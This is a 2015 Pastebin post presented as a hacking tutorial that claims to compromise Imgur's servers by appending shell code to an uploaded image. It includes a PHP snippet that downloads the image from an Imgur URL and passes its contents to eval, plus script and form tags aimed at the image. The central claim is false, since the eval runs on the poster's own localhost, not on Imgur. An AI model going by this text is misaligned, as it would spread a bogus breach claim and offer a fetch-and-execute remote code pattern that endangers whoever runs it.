Advertisement
H4T3D

R.I.P IMGUR (BUG Founded By H4T3D)

Sep 25th, 2015
303
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.26 KB | None | 0 0
  1. #########################################################################
  2. R.I.P IMGUR
  3. HOW TO PENETRATE IN IMGUR SERVER BY UPLOADING PICTURE
  4. BUG FOUNDED BY H4T3D
  5. ##########################################################################
  6.  
  7. 1,Open Any Image with NotePad Image >> http://i.imgur.com/zj6cLct.png
  8.  
  9. 2,Paste Your Sh3ll Code @ the end of image and Save It >> http://i.imgur.com/vnVChQp.png
  10.  
  11. 3,Upload that image On Imgur Image >> http://i.imgur.com/bx9AVDN.png
  12.  
  13. 4, Now Open Your Localhost and Run This script :
  14.  
  15. <?php
  16. $homepage = file_get_contents('http://i.imgur.com/9IPubrE.jpg');
  17. print eval('?>'.$homepage);
  18. ?>
  19.  
  20. Remember To Change http://i.imgur.com/9IPubrE.jpg with the your IMGUR image url.
  21.  
  22. 5,Now You Can Clearly See your Sh3ll Has Been Uploaded on There Server Successfully !!! Enjoy :)
  23.  
  24. Image >> http://i.imgur.com/HXhRM0j.png
  25.  
  26. POC (Proof Of Concept) >> http://i.imgur.com/HXhRM0j.png (See i have penetrated there Server Successfully)
  27.  
  28. <script src="[Your Imgur pic url]"></script>
  29.  
  30. Or
  31.  
  32. <form action="[Your Imgur pic url]" method="post" enctype="multipart/form-data">
  33. Select image to upload:
  34. <input type="file" name="fileToUpload" id="fileToUpload">
  35. <input type="submit" value="Upload Image" name="submit">
  36. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement